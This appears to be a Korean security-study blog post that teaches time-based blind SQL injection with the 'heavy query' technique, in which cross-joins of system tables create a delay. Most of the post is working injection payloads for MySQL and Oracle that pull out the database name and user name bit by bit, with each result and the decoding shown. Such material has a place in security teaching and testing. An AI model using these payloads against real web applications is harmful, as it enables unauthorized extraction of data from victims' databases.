Heavy Query Technique을 이용한 Time-Based 공격 본문

웹 해킹/SQL Injection

Heavy Query Technique을 이용한 Time-Based 공격

Kwon Oh! JUN 2022. 9. 20. 20:22

※ Heavy Query Technique

쿼리에 무거운 작업을 요청해서 딜레이 시키는 공격

' and (select case when 1=1 then (select count(*) from information_schema.schemata t1, information_schema.schemata t2, information_schema.schemata t3, information_schema.schemata t4, information_schema.schemata t5) else 1 end)=1#

참일 때 information_schema.schemata t1, information_schema.schemata t2, information_schema.schemata t3, information_schema.schemata t4, information_schema.schemata t5

의 개수를 카운트를 하는데 요청하는 작업이 무겁다보니 시간이 오래걸림

바로 이점을 활용해서 딜레이가 걸리면 참인거고 아니면 거짓을 판별할 수 있다.


그래서 참이면 count(*)=1은 거짓이니까 '%' and 거짓이니까 쿼리문은 거짓이되어서 게시물은 아무것도 검색되지 않는다.

거짓이면 '%' and 1=1 참이니까 쿼리문은 참이되어서 전체게시물이 검색된다. 

※ TMI : from information_schema.schemata t1, information_schema.schemata t2

테이블 추가될때마다 개수가 어떻게 변할까?

select * from information_schema.schemata t1;

infromation_schema.schmata t1의 count는 10개

select * from information_schema.schemata t1, information_schema.schemata;

information_schema.schemata t2가 추가되니까 개수가 100개로 뛴다.

본래의 컬럼에 컬럼이 추가되니까 골구로 섞일려면 본래의 데이터(10)에 본래의 데이터(10)가 중복되지 않게 교차해야한다. 


' and (select case when ascii(substring((select database()),1,1))&1=1 then (select count(*) from information_schema.schemata t1, information_schema.schemata t2, information_schema.schemata t3, information_schema.schemata t4, information_schema.schemata t5) else 1 end)=1# 정상 출력 0 DB : b□□□□
' and (select case when ascii(substring((select database()),1,1))&2=2 then (select count(*) from information_schema.schemata t1, information_schema.schemata t2, information_schema.schemata t3, information_schema.schemata t4, information_schema.schemata t5) else 1 end)=1# 딜레이 발생 1
' and (select case when ascii(substring((select database()),1,1))&4=4 then (select count(*) from information_schema.schemata t1, information_schema.schemata t2, information_schema.schemata t3, information_schema.schemata t4, information_schema.schemata t5) else 1 end)=1# 정상 출력 0
' and (select case when ascii(substring((select database()),1,1))&8=8 then (select count(*) from information_schema.schemata t1, information_schema.schemata t2, information_schema.schemata t3, information_schema.schemata t4, information_schema.schemata t5) else 1 end)=1# 정상 출력 0
' and (select case when ascii(substring((select database()),1,1))&16=16 then (select count(*) from information_schema.schemata t1, information_schema.schemata t2, information_schema.schemata t3, information_schema.schemata t4, information_schema.schemata t5) else 1 end)=1# 정상 출력 0
' and (select case when ascii(substring((select database()),1,1))&32=32 then (select count(*) from information_schema.schemata t1, information_schema.schemata t2, information_schema.schemata t3, information_schema.schemata t4, information_schema.schemata t5) else 1 end)=1# 딜레이 발생 1
' and (select case when ascii(substring((select database()),1,1))&64=64 then (select count(*) from information_schema.schemata t1, information_schema.schemata t2, information_schema.schemata t3, information_schema.schemata t4, information_schema.schemata t5) else 1 end)=1# 딜레이 발생 1
' and (select case when ascii(substring((select database()),1,1))&128=128 then (select count(*) from information_schema.schemata t1, information_schema.schemata t2, information_schema.schemata t3, information_schema.schemata t4, information_schema.schemata t5) else 1 end)=1# 정상 출력 0
01100010 → 98 → 'b'
' and (select case when ascii(substring((select database()),5,1))&1=1 then (select count(*) from information_schema.schemata t1, information_schema.schemata t2, information_schema.schemata t3, information_schema.schemata t4, information_schema.schemata t5) else 1 end)=1#   DB : board


ORACLE : user 이름
' and (select case when BITAND(ascii(substr((select user from dual),1,1)),1)=1 then (select count(*) from all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) else 1 end from dual)=1-- 1 user : C□□□□□□□□□□□□□
' and (select case when BITAND(ascii(substr((select user from dual),1,1)),2)=2 then (select count(*) from all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) else 1 end from dual)=1-- 1
' and (select case when BITAND(ascii(substr((select user from dual),1,1)),4)=4 then (select count(*) from all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) else 1 end from dual)=1-- 0
' and (select case when BITAND(ascii(substr((select user from dual),1,1)),8)=8 then (select count(*) from all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) else 1 end from dual)=1-- 0
' and (select case when BITAND(ascii(substr((select user from dual),1,1)),16)=16 then (select count(*) from all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) else 1 end from dual)=1-- 0
' and (select case when BITAND(ascii(substr((select user from dual),1,1)),32)=32 then (select count(*) from all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) else 1 end from dual)=1-- 0
' and (select case when BITAND(ascii(substr((select user from dual),1,1)),64)=64 then (select count(*) from all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) else 1 end from dual)=1-- 1
' and (select case when BITAND(ascii(substr((select user from dual),1,1)),128)=128 then (select count(*) from all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) else 1 end from dual)=1-- 0
01000011 → 67→ 'C'
' and (select case when BITAND(ascii(substr((select user from dual),14,1)),128)=128 then (select count(*) from all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) else 1 end from dual)=1--   user : C##CREHACKTIVE